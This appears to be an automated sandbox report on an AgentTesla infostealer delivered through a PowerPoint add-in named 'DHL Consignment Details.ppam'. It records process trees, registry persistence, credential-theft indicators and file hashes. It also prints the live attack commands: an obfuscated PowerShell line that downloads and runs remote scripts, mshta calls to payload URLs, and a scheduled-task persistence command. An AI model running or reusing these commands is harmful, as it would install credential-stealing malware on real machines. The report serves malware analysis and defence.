Analysis
-
max time kernel
111s -
max time network
125s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
19-10-2021 06:05
Static task
static1
Behavioral task
behavioral1
Sample
DHL Consignment Details.ppam
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
DHL Consignment Details.ppam
Resource
win10-en-20210920
General
-
Target
DHL Consignment Details.ppam
-
Size
8KB
-
MD5
e49c885d3236afa32adef83e8a201573
-
SHA1
f8e63da458adee3ece85529ddeba477a07087430
-
SHA256
6f931b139cdf0652432a133e3beef1ff6136571c8d953f3eee28316bbf9c5674
-
SHA512
7339c4c43193686e737c6c4dbfcaf7778195e2c51d057436426651c1a62375196f393b69e6abcffa1ca2fc75c4117fb719b5b51b3eb4bd4335c85a8d08f0e3ff
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 3904 1844 mshta.exe POWERPNT.EXE -
AgentTesla Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/1612-322-0x000000000043751E-mapping.dmp family_agenttesla behavioral2/memory/3832-390-0x000000000043751E-mapping.dmp family_agenttesla behavioral2/memory/3832-396-0x00000000054D0000-0x00000000059CE000-memory.dmp family_agenttesla -
Blocklisted process makes network request 11 IoCs
Processes:
mshta.exepowershell.exeflow pid process 34 3904 mshta.exe 37 3904 mshta.exe 39 3904 mshta.exe 42 3904 mshta.exe 44 3904 mshta.exe 46 3904 mshta.exe 47 3904 mshta.exe 49 3904 mshta.exe 51 3904 mshta.exe 52 3904 mshta.exe 54 1564 powershell.exe -
Drops file in Drivers directory 2 IoCs
Processes:
jsc.exeRegAsm.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts jsc.exe File opened for modification C:\Windows\system32\drivers\etc\hosts RegAsm.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
RegAsm.exejsc.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/12.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/12.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/12.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_e7293c57732f4f278d939202241e0b25.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_cf83a79c40724f5c8e18bb53de0f0399.txt').GetResponse().GetResponseStream()).ReadToend());" mshta.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exedescription pid process target process PID 1564 set thread context of 1612 1564 powershell.exe jsc.exe PID 1564 set thread context of 3832 1564 powershell.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 3784 taskkill.exe 2112 taskkill.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 1844 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
dw20.exepowershell.exejsc.exeRegAsm.exepid process 992 dw20.exe 992 dw20.exe 1564 powershell.exe 1564 powershell.exe 1564 powershell.exe 1564 powershell.exe 1564 powershell.exe 1612 jsc.exe 1612 jsc.exe 3832 RegAsm.exe 3832 RegAsm.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
RegAsm.exepid process 3832 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 3784 taskkill.exe Token: SeDebugPrivilege 2112 taskkill.exe Token: SeDebugPrivilege 1564 powershell.exe Token: SeDebugPrivilege 1612 jsc.exe Token: SeDebugPrivilege 3832 RegAsm.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
POWERPNT.EXEpid process 1844 POWERPNT.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
POWERPNT.EXEjsc.exeRegAsm.exepid process 1844 POWERPNT.EXE 1844 POWERPNT.EXE 1844 POWERPNT.EXE 1612 jsc.exe 3832 RegAsm.exe -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
POWERPNT.EXEmshta.exepowershell.execsc.exedescription pid process target process PID 1844 wrote to memory of 3904 1844 POWERPNT.EXE mshta.exe PID 1844 wrote to memory of 3904 1844 POWERPNT.EXE mshta.exe PID 3904 wrote to memory of 3784 3904 mshta.exe taskkill.exe PID 3904 wrote to memory of 3784 3904 mshta.exe taskkill.exe PID 3904 wrote to memory of 2112 3904 mshta.exe taskkill.exe PID 3904 wrote to memory of 2112 3904 mshta.exe taskkill.exe PID 3904 wrote to memory of 2692 3904 mshta.exe schtasks.exe PID 3904 wrote to memory of 2692 3904 mshta.exe schtasks.exe PID 3904 wrote to memory of 1564 3904 mshta.exe powershell.exe PID 3904 wrote to memory of 1564 3904 mshta.exe powershell.exe PID 3904 wrote to memory of 992 3904 mshta.exe dw20.exe PID 3904 wrote to memory of 992 3904 mshta.exe dw20.exe PID 1564 wrote to memory of 2292 1564 powershell.exe jsc.exe PID 1564 wrote to memory of 2292 1564 powershell.exe jsc.exe PID 1564 wrote to memory of 2292 1564 powershell.exe jsc.exe PID 1564 wrote to memory of 1612 1564 powershell.exe jsc.exe PID 1564 wrote to memory of 1612 1564 powershell.exe jsc.exe PID 1564 wrote to memory of 1612 1564 powershell.exe jsc.exe PID 1564 wrote to memory of 1612 1564 powershell.exe jsc.exe PID 1564 wrote to memory of 1612 1564 powershell.exe jsc.exe PID 1564 wrote to memory of 1612 1564 powershell.exe jsc.exe PID 1564 wrote to memory of 1612 1564 powershell.exe jsc.exe PID 1564 wrote to memory of 1612 1564 powershell.exe jsc.exe PID 1564 wrote to memory of 1352 1564 powershell.exe csc.exe PID 1564 wrote to memory of 1352 1564 powershell.exe csc.exe PID 1352 wrote to memory of 2856 1352 csc.exe cvtres.exe PID 1352 wrote to memory of 2856 1352 csc.exe cvtres.exe PID 1564 wrote to memory of 3832 1564 powershell.exe RegAsm.exe PID 1564 wrote to memory of 3832 1564 powershell.exe RegAsm.exe PID 1564 wrote to memory of 3832 1564 powershell.exe RegAsm.exe PID 1564 wrote to memory of 3832 1564 powershell.exe RegAsm.exe PID 1564 wrote to memory of 3832 1564 powershell.exe RegAsm.exe PID 1564 wrote to memory of 3832 1564 powershell.exe RegAsm.exe PID 1564 wrote to memory of 3832 1564 powershell.exe RegAsm.exe PID 1564 wrote to memory of 3832 1564 powershell.exe RegAsm.exe -
outlook_office_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
outlook_win_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\DHL Consignment Details.ppam" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://www.bitly.com/ajdwwdwdwdmlrufhjwijjd2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im winword.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_e7293c57732f4f278d939202241e0b25.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_cf83a79c40724f5c8e18bb53de0f0399.txt').GetResponse().GetResponseStream()).ReadToend());3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tj0xmbt4\tj0xmbt4.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE9D4.tmp" "c:\Users\Admin\AppData\Local\Temp\tj0xmbt4\CSC6A455C18B864498D83A45AECC44FA67B.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/12.html\""3⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 27083⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RESE9D4.tmpMD5
5c0ab55e200962088c5f46b2a9b8c7b6
SHA1775538ecbdf06cf3df25e02e90176c7630feb331
SHA2566a195a29c5e44a0c369bcb68c4439c65e4641dcd3207df1e8bd2e1521efea0bd
SHA5121654dd1268543013181b0658871fd4de13eb4fcd7c8141c473cbe97bba00e914c33033d225dc8b8f1b596efd8b5dbb872fb3ae6a3456144134b4eb9df13d9fca
-
C:\Users\Admin\AppData\Local\Temp\tj0xmbt4\tj0xmbt4.dllMD5
84b21bef1f0eaa8ef419f7fd29b95991
SHA1526ca3d99c9577be0566408645f798a601d0773c
SHA25608d50541a45d8705e4ce668f0d4581e5ddbd78dd74634b4dc31e74d10f8fb360
SHA5127ec28a6834b91ad115097fd5b7ac222ba25682883f26b376449c52700eb18bcf99f4158e0cf4410c86bef662847a05d4ec464e0a400bf0609673db5260172c47
-
C:\Windows\system32\drivers\etc\hostsMD5
5b2d17233558878a82ee464d04f58b59
SHA147ebffcad0b4c358df0d6a06ef335cb6aab0ab20
SHA2565b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542
SHA512d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b
-
\??\c:\Users\Admin\AppData\Local\Temp\tj0xmbt4\CSC6A455C18B864498D83A45AECC44FA67B.TMPMD5
57733ef912bb130d08e425db233b479b
SHA134034a542a37118785c9cf076e60d7350475b01a
SHA2560975a45dd14354e5aafe0646bc521141f66d3f3691d0736ff541e0a0967e50f1
SHA512b7587345487ae4a6555050f5ef054df6d5d79b2493a332078392632f9f68448a0c32cc184af03101bb9d1a45c1740a27d20ec5978099008d973a3dfd8e3d16fe
-
\??\c:\Users\Admin\AppData\Local\Temp\tj0xmbt4\tj0xmbt4.0.csMD5
e03b1e7ba7f1a53a7e10c0fd9049f437
SHA13bb851a42717eeb588eb7deadfcd04c571c15f41
SHA2563ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427
SHA512a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f
-
\??\c:\Users\Admin\AppData\Local\Temp\tj0xmbt4\tj0xmbt4.cmdlineMD5
5286688547aeb5b1a5efc76a85af07fa
SHA1065b6d02946d979bd186abf5b266cd38f1e271b0
SHA25631b42e2de2a5e9a2f7a7d255b9ce603ac7a50bddee4332a68b6c7e643970078e
SHA512dfd2e101f6ffee2975c40d2e093722c06536093d131917a0e4b60000a1f2bb9c3a66ed25e483c83808274fc72210860bbe9fcac87c4f375f8ec56ee89fe525d7
-
memory/992-298-0x0000000000000000-mapping.dmp
-
memory/1352-381-0x0000000000000000-mapping.dmp
-
memory/1564-312-0x0000022044253000-0x0000022044255000-memory.dmpFilesize
8KB
-
memory/1564-311-0x0000022044250000-0x0000022044252000-memory.dmpFilesize
8KB
-
memory/1564-297-0x0000000000000000-mapping.dmp
-
memory/1564-317-0x0000022044256000-0x0000022044258000-memory.dmpFilesize
8KB
-
memory/1612-405-0x0000000005821000-0x0000000005822000-memory.dmpFilesize
4KB
-
memory/1612-380-0x0000000005820000-0x0000000005821000-memory.dmpFilesize
4KB
-
memory/1612-322-0x000000000043751E-mapping.dmp
-
memory/1844-246-0x000001FC6B840000-0x000001FC6B844000-memory.dmpFilesize
16KB
-
memory/1844-119-0x000001FC5C160000-0x000001FC5C162000-memory.dmpFilesize
8KB
-
memory/1844-116-0x00007FFB51F30000-0x00007FFB51F40000-memory.dmpFilesize
64KB
-
memory/1844-117-0x00007FFB51F30000-0x00007FFB51F40000-memory.dmpFilesize
64KB
-
memory/1844-118-0x00007FFB51F30000-0x00007FFB51F40000-memory.dmpFilesize
64KB
-
memory/1844-127-0x00007FFB51F30000-0x00007FFB51F40000-memory.dmpFilesize
64KB
-
memory/1844-121-0x000001FC5C160000-0x000001FC5C162000-memory.dmpFilesize
8KB
-
memory/1844-120-0x000001FC5C160000-0x000001FC5C162000-memory.dmpFilesize
8KB
-
memory/1844-115-0x00007FFB51F30000-0x00007FFB51F40000-memory.dmpFilesize
64KB
-
memory/2112-295-0x0000000000000000-mapping.dmp
-
memory/2692-296-0x0000000000000000-mapping.dmp
-
memory/2856-384-0x0000000000000000-mapping.dmp
-
memory/3784-294-0x0000000000000000-mapping.dmp
-
memory/3832-390-0x000000000043751E-mapping.dmp
-
memory/3832-396-0x00000000054D0000-0x00000000059CE000-memory.dmpFilesize
5.0MB
-
memory/3832-407-0x00000000054D0000-0x00000000059CE000-memory.dmpFilesize
5.0MB
-
memory/3904-261-0x0000000000000000-mapping.dmp